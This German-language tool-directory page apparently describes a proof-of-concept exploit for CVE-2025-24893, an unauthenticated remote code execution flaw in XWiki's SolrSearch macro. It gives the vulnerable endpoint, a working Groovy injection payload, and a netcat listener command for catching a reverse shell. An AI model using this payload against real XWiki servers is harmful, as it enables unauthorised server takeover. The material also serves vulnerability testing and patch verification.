Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-24893 — Proof-of-Concept-Exploit für CVE-2025-24893, eine nicht authentifizierte Remote-Code-Ausführungsschwachstelle in XWiki durch unsichere Groovy-Ausdrucksbehandlung im SolrSearch-Makro. | Kitploit
Tools/GitHubGitHub/fomovet/cve-2025-24893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubfomovet/cve-2025-24893

cve-2025-24893

Proof-of-Concept-Exploit für CVE-2025-24893, eine nicht authentifizierte Remote-Code-Ausführungsschwachstelle in XWiki durch unsichere Groovy-Ausdrucksbehandlung im SolrSearch-Makro.

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24893 - XWiki Unauthenticated RCE Exploit PoC

⚠️ Nicht authentifizierte Remote-Code-Ausführung in XWiki
🛠️ PoC-Implementierung von @dollarboysushil

💡 Überblick

CVE-2025-24893 ist eine kritische RCE-Schwachstelle in XWiki, verursacht durch unsichere Groovy-Ausdrucksverarbeitung im SolrSearch-Makro. Ein Angreifer kann über eine manipulierte GET-Anfrage Groovy-Code einschleusen, was zu Remote Code Execution (keine Authentifizierung erforderlich) führt.

  • Schweregrad: Kritisch (CVSS 9.8)
  • Betroffen: Versionen < 15.10.11, 16.4.1, 16.5.0RC1

🛠 Technische Aufschlüsselung

Die Schwachstelle befindet sich im SolrSearch-Makro (Main.SolrSearch) von XWiki, das die Sucheingabe mittels unsicherer Groovy-Auswertung verarbeitet. Das Makro säubert die vom Benutzer bereitgestellte Eingabe nicht, was eine beliebige Codeausführung ermöglicht.

🔥 Verwundbarer Endpunkt

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

Ein Angreifer kann Groovy-Code in den Parameter text injizieren, der aufgrund unsachgemäßer Eingabebehandlung innerhalb des Makrosystems serverseitig ausgewertet wird.

💥 Beispiel-Payload

root@kitploit:~
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}

Dies führt zu einer nicht authentifizierten Remote Code Execution (RCE) auf verwundbaren XWiki-Instanzen.

🔬 Proof-of-Concept (PoC)-Demonstration

🧪 Zielumgebung

Das verwundbare Ziel ist eine XWiki-Instanz mit Version 15.10.8, die von CVE-2025-24893 betroffen ist.

Verwundbare XWiki-Oberfläche


📡 Vorbereiten des Listeners

Starten Sie einen Netcat-Listener auf dem Angreifer-Rechner, um die Reverse-Shell-Verbindung zu erfassen:

root@kitploit:~
nc -lvnp 1337

Netcat-Listener aktiv auf Port 1337


🚀 Start des Exploits

Führen Sie das Exploit-Skript CVE-2025-24893-dbs.py aus, um die Groovy-basierte RCE-Payload an den verwundbaren XWiki-Endpunkt zu senden.

Exploit-Skript wird ausgeführt


💻 Erfolgreicher Remote-Shell-Zugriff

Bei erfolgreicher Ausführung stellt die Reverse-Shell eine Verbindung zum Listener her und gewährt dem Angreifer Remote-Zugriff auf den Server.

Reverse-Shell hergestellt


📚 Referenzen

  • OffSec Blog: CVE-2025-24893 XWiki Groovy RCE
  • NVD-Eintrag: CVE-2025-24893
Tool herunterladen